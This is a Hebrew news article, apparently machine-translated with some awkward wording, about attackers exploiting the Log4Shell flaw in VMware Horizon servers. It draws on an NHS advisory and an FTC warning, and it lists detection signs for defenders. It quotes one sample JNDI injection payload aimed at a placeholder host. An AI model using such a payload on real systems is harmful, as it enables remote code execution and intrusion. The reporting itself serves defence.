מערכות תיקון פגיעות לליקויים קריטיים ב-Log4j, מזהירים בכירים בבריטניה וארה"ב

פושעים מנצלים באופן פעיל את הפגיעות בחומרה הגבוהה של Log4Shell בשרתים המריצים VMware Horizon בניסיון להתקין תוכנות זדוניות המאפשרות להם להשיג שליטה מלאה על המערכות המושפעות, כך מערכת הבריאות הממומנת על ידי הציבור בבריטניה אַזהָרָה.

CVE-2021-44228 היא אחת הפגיעות החמורות ביותר שהתגלו בשנים האחרונות. הוא שוכן ב-Log4J, ספריית קוד רישום מערכת המשמשת באלפי אם לא מיליוני יישומים ואתרי אינטרנט של צד שלישי. זה אומר שיש בסיס עצום של מערכות פגיעות. בנוסף, הפגיעות קלה ביותר לניצול ומאפשרת לתוקפים להתקין קונכיות אינטרנט, המספקות חלון פקודה לביצוע פקודות מורשות מאוד בשרתים פרוצים.

הפגם בביצוע קוד מרחוק ב-Log4J בא לאור בדצמבר לאחר פרסום קוד הניצול לפני שתיקון היה זמין. האקרים זדוניים החלו במהירות מנצל באופן פעיל CVE-2021-44228 ל לסכן מערכות רגישות.

ההתקפות, כולל כאלה המכוונות ל-VMware Horizon, נמשכות מאז אותה תקופה.

"נצפתה קבוצת איומים לא ידועה המכוונת לשרתי VMware Horizon המריצים גרסאות שהושפעו על ידי נקודות תורפה של Log4Shell

על מנת לבסס התמדה בתוך רשתות מושפעות", גורמים רשמיים עם מערכת הבריאות הלאומית של בריטניה כתבתי. הם המשיכו לספק הנחיות לגבי צעדים ספציפיים שארגונים מושפעים יכולים לנקוט כדי להפחית את האיום.

העיקרית ביניהם היא ההמלצה להתקין עדכון זה VMware שוחררה עבור מוצר Horizon שלה, שנותן לארגונים אמצעים לווירטואליזציה של יכולות שולחן העבודה והאפליקציות באמצעות טכנולוגיית הוירטואליזציה של החברה. פקידי NHS ציינו גם סימנים שארגונים פגיעים יכולים לחפש כדי לזהות כל התקפות אפשריות שהם ספגו.

הייעוץ מגיע יום לאחר ועדת הסחר הפדרלית הזהיר עסקים הפונים לצרכן לתקן מערכות פגיעות כדי למנוע את גורלה של Equifax. בשנת 2019 הסכימה הסוכנות לדיווח אשראי לשלם 575 מיליון דולר להסדיר את חיובי ה-FTC הנובעים מכישלונו בתיקון פגיעות חמורה דומה בתוכנה אחרת המכונה Apache Struts. כאשר תוקף לא ידוע ניצל את הפגיעות ברשת של Equifax, זה הוביל ל- פגיעה בנתונים רגישים עבור 143 מיליון אנשים, מה שהופך אותו לאחד מה הפרות הנתונים הגרועות ביותר אֵיִ פַּעַם.

"ה-FTC מתכוון להשתמש בסמכות החוקית המלאה שלו כדי לרדוף אחרי חברות שלא נוקטות בצעדים סבירים להגן על נתוני צרכנים מפני חשיפה כתוצאה מ-Log4j או פגיעויות ידועות דומות בעתיד", FTC פקידים אמר

ה-NHS הוא לפחות הארגון השני שראה ניצולים המכוונים למוצר VMware. בחודש שעבר, חוקרים דיווח שתוקפים כוונו למערכות המרצות את VMware VCenter במטרה להתקין את תוכנת הכופר Conti.

ההתקפות המכוונות לשרתי VMware Horizon ללא תיקון מכוונות לשימוש שלה בשירות קוד פתוח.

"סביר להניח שהמתקפה יזומה באמצעות מטען Log4Shell הדומה ל-${jndi: ldap://example.com}", קבע הייעוץ של NHS. "ההתקפה מנצלת את הפגיעות של Log4Shell בשירות Apache Tomcat המוטמע בתוך VMware Horizon. זה מפעיל את פקודת PowerShell הבאה, שהולידה מ-ws_TomcatService.exe:"

לאחר מספר שלבים נוספים, התוקפים מסוגלים להתקין מעטפת אינטרנט בעלת תקשורת מתמשכת עם שרת שהם שולטים בהם. הנה ייצוג של המתקפה:

הייעוץ הוסיף:

ארגונים צריכים לחפש את הדברים הבאים:

• עדות ל ws_TomcatService.exe הולידת תהליכים חריגים
• כל powershell.exe תהליכים המכילים 'VMBlastSG' בשורת הפקודה
• שינויים בקבצים ל'...\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js' - קובץ זה מוחלף בדרך כלל במהלך שדרוגים, ואינו משתנה

חברת האבטחה Praetorian שוחררה ביום שישי הכלי הזה לזיהוי מערכות פגיעות בקנה מידה.